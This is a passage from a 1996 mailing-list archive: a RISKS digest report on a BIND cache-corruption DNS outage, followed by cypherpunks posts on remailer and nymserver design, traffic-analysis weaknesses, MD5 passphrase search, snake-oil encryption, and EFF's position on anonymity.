replacements for the current DNS system can be used, preferably with prevention
of removal of DN for political reasons?
	-Allen

From:	IN%"rre@weber.ucsd.edu" 27-AUG-1996 06:03:35.07

[Maybe the next Internet myth to bust up is this stuff about the Internet
being decentralized.  "Designed to survive a nuclear attack", etc etc.
I'm afraid it doesn't work like that.  The net has little redundancy, the
backbones are in the hands of a small number of large companies, and all
of the detailed mechanics of getting your packets to their destination are
fragile and prone to propagating errors.  The high levels of service to
which we've grown accustomed are due to the hard work of specific people,
not to the intrinsic properties of the machinery.  The net works because
those people are able to do the right thing.  The conditions that *let*
them do the right thing may disappear next month, or the month after that.
So let's forget the technological determinism and lose our complacency
about the future, and instead have a little gratitude to the hackers who
make it work and a little political concern for the architectural choices
that are coming right up on the horizon.]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Mon, 26 Aug 1996 14:15:06 -0700 (PDT)
From: risks@csl.sri.com

RISKS-LIST: Risks-Forum Digest  Monday 26 August 1996  Volume 18 : Issue 38

----------------------------------------------------------------------

Date: Sat, 24 Aug 1996 08:53:31 -0700
From: stevenw@best.com (Steven Weller)
Subject: DNS failure [from Matthew Dillon]

The following describes DNS meltdown at my ISP the other day: all DNS
services were unavailable, despite multiple servers being online. Lack of
DNS assured that other working services were unavailable to everyone who
didn't have IP addresses written down.

    Here is a technical explanation of the DNS failure, for those of you
    interested.

    First, a synopsis of how DNS works... every site on the net serves their
    own DNS records.  Some sites serve other people's DNS records.  For
    example, BEST serves the DNS records for best.com, best.net, and most
    of our customer's custom domains.  No site serves more then a small
    fraction of the DNS records on the internet from their own database.

    The way DNS works is that when a domain name needs to be resolved, our
    DNS server (anyone's DNS server) first goes to the NIC to ask where to
    go to resolve the domain name.  The NIC itself cannot resolve domains,
    it can only tell our DNS server where to go to resolve a domain.

    Our DNS server then goes to the specified remote site to resolve the
    domain name belonging to that site. The remote site replies with the 
    answer which our DNS server (a) caches for future reference, and 
    (b) returns to the original requester.

    The caching is important, because otherwise a DNS server would have to
    re-query the remote DNS server every time someone wanted to resolve a 
    domain.  DNS records propagate through caches.  It is simply not possible
    to run a DNS system with caching turned off, it would create an impossible
    load on the internet.

    Around 4:00 a.m. yesterday, some unknown site's cache got corrupted.
    The corruption propagated to many (hundreds) of other sites on the internet
    and eventually propagated to us.  This corruption hit a bug in the DNS
    server program that wound up corrupting the program, causing DNS to
    loose major records.
    
    Restarting the server in this case does not solve the problem because, 
    due to the caching on remote sites, the corrupted record repropagates 
    almost instantly.  BEST was hit by this problem very hard due to the
    large number of custom domains we serve... so many DNS requests come into
    BEST and are made by BEST that our servers would hit the corruption out
    on the internet within 10 seconds of starting up.

    Worse, this particular corruption tended to destroy the root records
    (stored in memory), called SOA records, for the domains served locally. 
    This destroyed the mail system causing mail messages to bounce rather then
    to simply be delayed, because the DNS server was saying 'site X does
    not exist' rather then timing out.  It's worst possible corruption that 
    can occur in a DNS system.

    --

    It turns out that the last two BIND releases contain a bug that,
    when a corrupted record of the type that started propagating at 4:00 a.m.
    is received, results in the destruction of other **unassociated** 
    records stored in memory.

    The particular release of BIND that we were using had been running
    perfectly for several *months* before this incident.  It was not something
    recently installed.

    There are two fixes to the problem:  (1) One can lock out those sites
    where the corrupted records come from, and (2) One can revert to an older
    release.  (1) is not a good solution because, due to the nature of DNS,
    corruption can propagate to many sites and it would be impossible to keep
    up to date and lock all of them out.  We wound up taking action #(2)
    and reverting to an older release of bind which, fortunately, did not
    have the bug that caused the problem.  We had to revert to BIND 4.9.3.
    Unfortunately, we did not think to do this for many hours because we were
    all convinced that the problem was external in nature and just didn't 
    think to try a reversion.  In hind sight, that is the first thing we
    should have tried since we had the friggin binary for the older version
    sitting in our source tree.

    As far as DNS goes... the DNS we run is not 'bsd' or 'sgi' .. it's the
    *official* world-wide BIND distribution run by Paul Vixie.  It is really
    not appropriate to run the older versions shipped with most operating 
    systems due to massive, massive security holes.  The corruption problem
    was unavoidable.  What *was* avoidable was the long period of time that
    elapsed before the problem got fixed, which I take full responsibility for.
    We spent most of that time trying to track down where the corruption was
    coming from... a near impossible task.  Around 6:00 p.m. scuttlebutt
    started propagating regarding a possible bug in the last two BIND releases 
    at which point we instantly reverted to an earlier version, which fixed 
    the problem, then started banging our heads against the wall for not trying
    it earlier.

    Matthew Dillon   Engineering, BEST Internet Communications, Inc.
                     <dillon@best.net>

------------------------------

Date: 15 Aug 1996 (LAST-MODIFIED)
From: RISKS-request@csl.sri.com
Subject: Abridged info on RISKS (comp.risks)

 The RISKS Forum is a MODERATED digest.  Its Usenet equivalent is comp.risks.
=> SUBSCRIPTIONS: PLEASE read RISKS as a newsgroup (comp.risks or equivalent) 
 if possible and convenient for you.  Or use Bitnet LISTSERV.  Alternatively,
 (via majordomo) DIRECT REQUESTS to <risks-request@csl.sri.com> with one-line, 
   SUBSCRIBE (or UNSUBSCRIBE) [with net address if different from FROM:] or
   INFO     [for unabridged version of RISKS information]
=> The INFO file (submissions, default disclaimers, archive sites, .mil/.uk
 subscribers, copyright policy, PRIVACY digests, etc.) is also obtainable from
 http://www.CSL.sri.com/risksinfo.html  ftp://www.CSL.sri.com/pub/risks.info
 The full info file will appear now and then in future issues.  *** All 
 contributors are assumed to have read the full info file for guidelines. ***
=> SUBMISSIONS: to risks@CSL.sri.com with meaningful SUBJECT: line.
=> ARCHIVES are available: ftp://ftp.sri.com/risks or
 ftp ftp.sri.com<CR>login anonymous<CR>[YourNetAddress]<CR>cd risks
 or http://catless.ncl.ac.uk/Risks/VL.IS.html      [i.e., VoLume, ISsue].
 The ftp.sri.com site risks directory also contains the most recent 
 PostScript copy of PGN's comprehensive historical summary of one liners:
   get illustrative.PS

------------------------------

End of RISKS-FORUM Digest 18.38 
************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 3 Sep 1996 06:49:22 +0800
To: tcmay@got.net
Subject: Re: Scoring Politicians on Digital Liberty Issues (Re: Net Politics)
Message-ID: <01I90CVK55W89JDDSI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I would suggest that support for "parental empowerment" and for
any sort of mandated rating system (e.g., PICS with a requirement to rate
pages for parental censorship use) be a down-rating.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 3 Sep 1996 15:55:32 +0800
To: cypherpunks@toad.com
Subject: Solid Foundations
Message-ID: <ae50bc6d0202100429d0@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:57 PM 9/2/96, lcs Remailer Administrator wrote:

>Well, I just designed a nymserver that's probably more complicated and
>difficult to use than any previous one.  From this experience, I have
>concluded that if you want to design a remailer with real security (as
>opposed to a penet-style server), it just won't be easy to use that
>remailer manually.  Even alpha.c2.org was kind of a pain to use
>manually.  I therefore think in the long run it's better to bite the
>bullet, write as secure a nym server as possible, and expect that
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>people will use special client software to use the remailer.

I strongly agree. It's very important that _foundations_ be as robust and
strong as possible. Then on top of this foundation, other layers can be
added without the whole structure tumbling down when flaws in the
underlying protocols are discovered.

This has been one of my pet theories for a long time. Not just the fairly
obvious point that foundations need to be robust, but the specific point
that one of the strengths of PGP was that it dealt with *text blocks*.
Though we all want integration into our favorite programs, by building PGP
around a text block there were several advantages. First, a simpler problem
than trying to deal with n different programs. Second, a text block has
fewer places for flaws to creep in. Third, platform independence. Fourth,
any editor or other program that can access text can potentially be used
with PGP. Fifth, separating crypto functions from other functions is good,
orthogonal, method-oriented design. Sixth, this allows drop-in replacements
(where "hooks" are used.)

(To understand why these points are so important, one needs to look at
programs which integrate crypto directly...independent verification is
harder to do, bugs may be less apparent, and delays in supporting other
platforms (if ever) are likely, etc..)

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 3 Sep 1996 06:54:56 +0800
To: Christopher Carper <ccarper@microsoft.com>
Subject: Re: desubscribe
In-Reply-To: <c=US%a=_%p=msft%l=RED-78-MSG-960902172601Z-20683@tide19.microsoft.com>
Message-ID: <199609022045.QAA21135@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Christopher Carper writes:
> desubscribe

Never.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 3 Sep 1996 10:19:17 +0800
To: cypherpunks@toad.com
Subject: Re: strengthening remailer protocols
Message-ID: <ae50bfcc03021004f4a7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:25 PM 9/2/96, John Anonymous MacDonald wrote:
>I don't really see the use of this complicated scheme.  The main
>problem seems to be that if M floods remailer R with messages to B,
>and A sends a message to C through R, then it will be clear to M that
>A's message was destined for C.
>
>Rather than divert messages, then, I propose that for each input
>message there is a 10% chance that a piece of cover traffic is
>generated.  Thus, if M sends 50 messages through R and sees 6 outgoing
>messages going to remailers C, D, and D, he will now know which
>messages correspond to the message that A send through.

This type of attack is why "reply-block" schemes are fundamentally flawed.
Any such scheme gives an attacker (a traffic analyst) a wedge with which to
deduce mappings. It is a kind of "chosen plaintext" attack (loosely
speaking). Or a "forcing attack." Maybe a "flooding attack" is as good a
name as any. One floods the reply block and simply watches where the water
goes.

(If there were more academics in the crypto community looking at digital
mix issues, there would likely be clever names for the various attacks.)

Several folks on this list, including (from memory), Scott Collins, Wei
Dai, Hal Finney, myself, and others, have noted this weakness over the
years.

Note that merely fiddling around with probabilities of transmission, such
as described above, will not be enough. This just adds a layer of noise,
which will disappear under a correlation analysis.

(For newcomers, there are interesting parallels between statistical
analysis of ciphers and similar analysis of remailer networks. And lots of
statistical tools can be used to deduce likely mappings based on
source/sink correlations, digram analysis, etc. Making a remailer network
robust against such analyses will take a whole more basic thinking. Merely
increasing message volume is not enough. Nor is increasing latency enough.
Generally speaking, of course.)

Instead of reply blocks, I think use of message pools (a la BlackNet) is a
more robust reply method, as it uses "widely-distributed messages" (a la
Usenet newsgroups) to get around the source/sink correlation issue.

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 3 Sep 1996 06:47:56 +0800
To: Asgaard <asgaard@Cor.sos.sll.se>
Subject: RE: Sharp knives
In-Reply-To: <Pine.HPP.3.91.960902134028.4162B-100000@cor.sos.sll.se>
Message-ID: <Pine.SUN.3.94.960902165001.26405A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Sep 1996, Asgaard wrote:

>  "James A. Donald" <jamesd@echeque.com>, writes:
>  >I heard on talk.politics.guns somebody say that in Sweden they
>  >had banned knives with a sharp point at the end, and were going
>  >to ban sharp knives altogether.  I think he was just engaging in
>  >hyperbole, that he really meant that gun control in Sweden was
>  >unreasonably strict, but on reflection I am not sure.
> 
> There is a law in Sweden, some 5 years old, against carrying
> 'dangerous devices' (hunting knives, Ninja stars etc) in 'public
> places' (unless you are a carpenter, electrician or some such
> going about your business). It's okay to carry a knife when
> going fishing/hunting or sitting on your terrace carving totem poles.
> It's only a misdemeanour and might be punished with a fine,
> but usually the cops just use the law to disarmour street gangs
> on the spot. The effects of the law are dubious. Knives have come
> into fashion among teenagers after this legislation (but not as
> a consequence of it, I think).


This mirrors D.C.'s concealed weapon law.

A screwdriver is a weapon if you are carrying it for that purpose (i.e. if
the cop thinks he wants to arrest you) but a tool if you are carrying it
for that purpose (i.e., if you are wearing an expensive suit and look
non-ethnic).

> 
> Asgaard
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DAVID A MOLNAR <molnard1@nevada.edu>
Date: Tue, 3 Sep 1996 09:47:26 +0800
To: cypherpunks@toad.com
Subject: Question re: MD5/other key-crunching methods
Message-ID: <Pine.OSF.3.91.960902161654.16753A-100000@pioneer.nevada.edu>
MIME-Version: 1.0
Content-Type: text/plain


On the plane back home, I had the pleasure of being treated to a 
screening of "Sgt. Bilko". Not a bad movie overall, but had a nice 
throwaway crypto line. It got me to thinking, though...

Is it possible to make generalizations about the MD5 hashes of classes of 
input values? That is, can one say that "no input values of length 
greater than 512 bits will..." or 'all input values starting with the 
value 3 have a tendency to..." with any degree of probability? I know 
hash functions strive to evenly distribute values over their range, but I 
wonder if it might sometimes be possible to predict the hash of a value 
without computing it.

Why? Well, it's mainly in regards to the way MD5 and other hash functions 
are used in mapping pass phrases to actual key values for a cipher.

Suppose I have a situation in which I feel comfortable in making
certain generalizations about the passphrase. Perhaps it's all lowercase, 
perhaps all alphanumeric, has five hyphens, whatever. Information which 
may allow one to restrict the passphrase to a certain range.

In a system where the passphrase is the encryption key, that range of key 
values can be doled out and searched sequentially. Since they are likely 
to be one or several contiguous blocks, one may simply distribute the 
task of searching each one to willing machines everywhere. The efforts 
with respect to RC4-40 in the previous year prove that much. If I can 
rule out even 10% of all possible keyvalues, I've saved a good deal of 
time.

What if one is dealing with a passphrase key-crunched w/MD5, though? The 
obvious way to go about it is to compute the MD5 hash for each and every 
value in the given range, then test that set of keys. This is an extra 
step, and adds a measure of extra time to the whole operation. Sure, one 
may abstract it away by claiming it's trivial compared to the problem of 
searching an exponetially large keyspace, but that seems something of a 
cop-out. 

Perhaps it's a silly question, but is it possible to identify a set of 
hashes which correspond to a set of domain values w/o performing the hash 
itself? I'm aware that it's not possible to reverse a one-way hash like 
MD5 (wish we could...what a compression ratio!), and I know "good" hash 
functions strive for properties which would make this exceedingly 
difficult. However, has anyone looked at the question? Is it worth 
considering? 

Thanks.

-David Molnar
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 3 Sep 1996 06:59:38 +0800
To: Esther Dyson <edyson@edventure.com>
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <19960902152515012.AAA179@Esther.edventure.com>
Message-ID: <Pine.SUN.3.94.960902165133.26405B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Sep 1996, Esther Dyson wrote:

> At least you don't accuse me of being a Communist.

Without commenting on the question of intelligence agencies, far left and
far right on this issue are fairly non-distinct.

> Esther Dyson				Always make new mistakes!
> EDventure Holdings
> <edyson@edventure.com> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 3 Sep 1996 10:18:54 +0800
To: survival@aa.net
Subject: Re: Pseudocrypto detector is going wild (was: Re: ALPHACIPHER - An unbreakable encryption program.)
Message-ID: <199609030003.RAA03934@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


C Matthew Curtin <cmcurtin@research.megasoft.com> posted a reference
to ALPHACIPHER, which appears to be Yet Another Snake Oil System.
It's got good intentions - it uses (ahem) "one-time pads", and 
tries to build a convenient user interface for low-volume work.
Of course, it apparently doesn't quite get it:
>       ALPHACIPHER uses key sets generated by a 
>       proprietary random key set generator 
>       to insure the production of unique, high-quality keys. 

The key set generation is inherently part of the encryption process;
since it's proprietary, it's not possible to test the quality of the
random numbers, but they must be assumed to be low-quality crackable stuff
unless the author is willing to reveal the algorithm and demonstrate
otherwise.

The program is written in DOS, and produces its output as
UPPERCASE LETTERS to avoid being caught by eavesdropping scanners
that might detect other patterns.  Not unreasonable, I guess.

The author, Wolfgang Hammersmith, also wrote The New ADFGVX,
a cypher that can be done by hand (if necessary), which he does
acknowledge is breakable, but comments that for short messages,
there may not be enough information to break it.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Tue, 3 Sep 1996 07:16:56 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Mailboxes?
In-Reply-To: <Pine.LNX.3.95.960902133457.456A-100000@gak>
Message-ID: <Pine.LNX.3.94.960902165706.10756A-100000@anx0918.slip.appstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Sep 1996, Mark M. wrote:

> Date: Mon, 2 Sep 1996 13:41:04 -0400 (EDT)
> From: "Mark M." <markm@voicenet.com>
> Reply-To: cypherpunks@toad.com
> To: cypherpunks@toad.com
> Subject: Re: Cypherpunk Mailboxes?
> 
> On Mon, 2 Sep 1996, William H. Geiger III wrote:
> 
> > Hi,
> >
> > I have a thought for addressing the anon. problem.
> >
> > We could create a network of anonymous remailers with mailboxes. All
> > messages in the mailboxes are stored encrypted. No information about the
> > users are keep. Users would be be given x K of mailbox space.
> >
> > We could use PGP keys for encrypting the messages. Each user would have his
> > own key pair for his anonymous mailbox. Any plain text messages received to
> > the server would be encrypted on recept.
> >
> > Let the government's subpoena away. :)
> >
> > "Sorry we don't have user addresses, no I can't decrypt those messages
> > Senator." <BEG>
> >
> > What do you think?
> 
> The only problem is there has to be someway for users to retrieve their mail.
> The current nym server approach is to use an encrypted reply block to send a
> user new mail.  This way the nym server doesn't know who the user is.  If users
> have to actively retrieve their mail, then the feds could install a packet
> sniffer on the remailers net link to find out the real email address of an
> anonymous user.
> 
> -- Mark
> 
> PGP encrypted mail prefered.
> Key fingerprint = d61734f2800486ae6f79bfeb70f95348
> http://www.voicenet.com/~markm/

Hrmm.. perhaps there's a better way...
such as having the user and the mail server negoiae a key (i don't really
know the details of diffie-hellman or he like, so tell me if this isn't
feasable), and have the encryption/decypion routines strip addresses,
so that the person is only identifiable by their key...

anybody see what i'm saying?

 --Deviant
All extremists should be taken out and shot.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Tue, 3 Sep 1996 07:21:33 +0800
To: cypherpunks@toad.com
Subject: Re: SCO giving free licenses to UNIX OpenServer
In-Reply-To: <5025qi$k65@life.ai.mit.edu>
Message-ID: <322B4E8E.41C6@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray wrote:
> 
> Scottauge@aol.com writes:

> > Read, Understand, and Delight... Microsoft maybe in trouble at last.
> 
> I doubt it.  People don't use Microsoft products because
> of their quality or functionality.

Errmm.. hate to disappoint but SCO UNIX started life as Xenix which
was written by Microsoft in the dark ages. 


> > This is for single user home based UNIX systems.
> 
> Single-user UNIX isn't all that useful.

Multi-user ain't much better. Listen to the guys who built it. UNIX
is a program development environment. In the early years it was
interesting because there was source available, that ceased to be
the case years ago.

Today Linux probably represents the future of the UNIX familly, it
allows people who want to hack at the OS level access to the sources
of a fully functioning OS. This allows people to add in new kernel
features, schedulers and other exotica without having to write a
whole new O/S.

Just don't confuse it with "home computing", this is geek computing
and you better have a lot of interest in computing to use it. Home
computing is the market for users who need a system thats simpler
than a VCR or they can't use it. At one time that meant Apple, today
it means Microsoft, it will never mean Linux - not unless someone
can make Linux much much simpler than it is at present and provide
decent WISIWIG tools such as editors etc. designed for use by aunt
Ethel.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 3 Sep 1996 13:04:16 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: The Earliest CP Remailer *DID* Emphasize Anonymity
Message-ID: <199609030030.RAA04862@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:05 AM 9/2/96 -0700, Tim wrote:
>No, the focus was at _least_ as much on providing anonymity as on
>protection from eavesdroppers or traffic analysts. More so, actually.
>How do I know this? Well, I was the one who did the presentation on
>Chaumian mixes at the first meeting, describing them as remailers and using
>paper envelopes-within-envelopes to illustrate the concept.
>Later that day, in the "Crypto Anarchy Game" we played to educate the

Thanks for the history correction; I got involved with Cypherpunks about
a year after the initial meeting/game, so I'm going on other people's
comments about the intent of mixes and remailers.  Out of curiousity,
did either spam or blackmail show up during the first run of the game?

>And all of the early uses were explicitly to anonymize the sender, not to
>deter eavesdropping (which conventional crypto works well for, anyway).

Keeping the sender's identity hidden from the recipient is a different
problem than keeping either of them hidden from Untrusted Third Parties.
Conventional crypto is fine for keeping message content secure from
eavedroppers, but isn't enough to prevent traffic analysis;
that requires either mixes or at least message pools or broadcasts.

> Kleinpaste .... Julf ....
I've also been pleased by how long Julf's remailer stayed in business.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 3 Sep 1996 12:36:31 +0800
To: cypherpunks@toad.com
Subject: Re: The Earliest CP Remailer *DID* Emphasize Anonymity
Message-ID: <ae50cd590402100423c9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:27 AM 9/3/96, Bill Stewart wrote:
>At 11:05 AM 9/2/96 -0700, Tim wrote:
>>No, the focus was at _least_ as much on providing anonymity as on
>>protection from eavesdroppers or traffic analysts. More so, actually.
>>How do I know this? Well, I was the one who did the presentation on
>>Chaumian mixes at the first meeting, describing them as remailers and using
>>paper envelopes-within-envelopes to illustrate the concept.
>>Later that day, in the "Crypto Anarchy Game" we played to educate the
>
>Thanks for the history correction; I got involved with Cypherpunks about
>a year after the initial meeting/game, so I'm going on other people's
>comments about the intent of mixes and remailers.  Out of curiousity,
>did either spam or blackmail show up during the first run of the game?

A full range of interesting behaviors showed up. Usually this was
publicized via the "out-of-band" channel of someone yelling "Hey, I was
just told to deposit $100 credits to the account of "AnonymousBanker" or
else my digital pseudonym will be published."

A murder-for-hire business was started, several weapons-trading schemes
developed, etc. Information selling was a big market success.

(Not very surprising, given that Eric and I devised the playing cards,
roles to be played (banker, assassin, money launderer, freedom fighter,
whistleblower, etc.), and doled out crypto-currency (Monopoly money). The
idea was not to discover real-world lessons, of course, but to graphically
demonstrate some of the technology, some of the ways crypto-anonymity would
change interactions, etc.)


>>And all of the early uses were explicitly to anonymize the sender, not to
>>deter eavesdropping (which conventional crypto works well for, anyway).
>
>Keeping the sender's identity hidden from the recipient is a different
>problem than keeping either of them hidden from Untrusted Third Parties.
>Conventional crypto is fine for keeping message content secure from
>eavedroppers, but isn't enough to prevent traffic analysis;
>that requires either mixes or at least message pools or broadcasts.

Yes, but my point was more that we were more concerned about building a
solid foundation which would solve a larger class of problems than just
straight encryption would. Remailers do this.

Anonymity of sender was a dominant mode in the game, for various reasons.
But anonymity of receiver was also possible (we faked message pools by
pinning messages to a board and then letting them be taken down, but not
letting others spend time seeing which were taken down...obviously a
determined person could have seen which were removed, and by whom...).

Regarding traffic analysis, at least one person (George ?) set himself up
as an NSA traffic analyst and tried to deduce pseudonym/true name mappings.
(We gave some people roles as "NSA," "narc," and whatnot.)

I no longer recall all the details of how the game evolved, interesting
behaviors seen, etc. I think someone posted a summary of his reactions to
the game a few weeks afterward, circa September/October 1992. It should be
in any archives that cover this period.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Remailer Administrator <mix-admin@nym.alias.net>
Date: Tue, 3 Sep 1996 09:06:48 +0800
To: cypherpunks@toad.com
Subject: Re: Too few nymservers
In-Reply-To: <199609021918.VAA21564@basement.replay.com>
Message-ID: <199609022157.RAA01689@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> [snip]
> > There has to be more crypto anonymizing aliasing remailers and with 
> > easier interfaces.  Closing the Kleinpaste derived server will help 
> > put the pressure of demand to start better remailer systems.  
> > There's not enough capacity and reliability with the servers extant.
> > There should be thousands of full featured remailers.
> 
> Exactly.  Sometimes *all* the nymservers are down at the same time.

Well, I just designed a nymserver that's probably more complicated and
difficult to use than any previous one.  From this experience, I have
concluded that if you want to design a remailer with real security (as
opposed to a penet-style server), it just won't be easy to use that
remailer manually.  Even alpha.c2.org was kind of a pain to use
manually.  I therefore think in the long run it's better to bite the
bullet, write as secure a nym server as possible, and expect that
people will use special client software to use the remailer.

Incidentally, if anyone else wants to run another nym.alias.net-style
remailer, the code is available and I'd be glad to help anyone set
things up if that person is serious about running a nymserver.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 3 Sep 1996 09:53:07 +0800
To: Stanton McCandlish <mech@eff.org>
Subject: What is the EFF doing exactly?
In-Reply-To: <199609022132.OAA16572@eff.org>
Message-ID: <Pine.SUN.3.94.960902174944.29644A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Sep 1996, Stanton McCandlish wrote:

> > > What is or is not your personal or EFF's official position is meaningless.
> > > It is clear that the personal beliefs of those involved in EFF are
> > > those of compromise, present day politics, and a general lack of moral
> > > fiber.
> 
> But that's not clear at all, since none of you have access to internal 
> discussion on this or any other topic here.  Esther's position is one of 
> guarded caution. Our former board member David Johnson's was one of 
> almost complete anti-anonymity (a fact that probably had a lot to do with 
> his leaving the board), while other board and staff members are 100% 
> pro-anonymity, and yet others are middleground or entirely silent on the 
> topic.

Why am I any more mistaken  for pointing out that a single influential
member of EFF's staff or board is anti-anonymity and yet remains with the
organization than you are for pointing out that a single influential
member who happened to be anti-anonymity has left?

If my position, as you represent, is misguided, surely your point about
Mr. Johnson is equally so.  If the board is almost 100% pro-anonymity,
where's the official position?

In so far as an organization is much defined by those involved, I think it
entirely right to wonder aloud about the personal motives of the staff and
board.  I think this PARTICULARLY prudent given EFF's reputation and prior
conduct.

I would be most happy to be proven wrong and see EFF suddenly, in a burst
of impressive moral fiber, speak out publically and take some political
action to assure anonymous communication.

> 
> Things simply are not as black and white as they might seem.
>

Well, let's have a clear official position issued then to end all dispute.

> > I agree with you whole-heartedly. I am stunned by the EFF's position on
> > this matter and they no longer have my support. Here are some more
> > of Dyson's statements on this subject.
> 
> You've not been reading very carefully. There is no "EFF's position on 
> this matter".  There is just Esther Dyson's position on this matter, 
> and quoted out of context.

Maybe there should be an EFF position on the matter.

What is EFF doing if not supporting anonyminity?

I'm hardly going to support an organization that proports to be
pro-internet freedom and yet has no official position on anonyminity.  Of
course you should expect people to wonder about EFF when you have no
official position and yet some staff and board members seem to have a
statist
bent.

> --
> <HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
> </A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
> </A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
> </A><P>        Online Activist    </HTML>

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <MAILER-DAEMON@mqg-smtp3.usmc.mil>
Date: Tue, 3 Sep 1996 09:59:07 +0800
To: <cypherpunks@toad.com>
Subject: Undeliverable Message
Message-ID: <vines.Afe5+lgp8mB@mstrinet.usmc.mil>
MIME-Version: 1.0
Content-Type: text/plain


To:            <cypherpunks@toad.com>
Cc:            
Subject:       Re: Cypherpunk Mailboxes?

Message not delivered to recipients below.  Press F1 for help with VNM
error codes.               

	VNM3043:  BANYAN SERVER@MAG26@2DMAW NEW RIVER


VNM3043 -- MAILBOX IS FULL

   The message cannot be delivered because the
   recipient's mailbox contains the maximum number of 
   messages, as set by the system administrator.  The
   recipient must delete some messages before any
   other messages can be delivered.
    The maximum message limit for a user's mailbox is 
   10,000.  The default message limit is 1000 messages.  
   Administrators can set message limits using the 
   Mailbox  Settings function available in the 
   Manage User menu  (MUSER). 

   When a user's mailbox reaches the limit, the 
   user must delete some of the messages before 
   the mailbox can accept any more incoming messages.

UNDEFINED-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 2 Sep 1996, William H. Geiger III wrote:

> Hi,
> 
> I have a thought for addressing the anon. problem.
> 
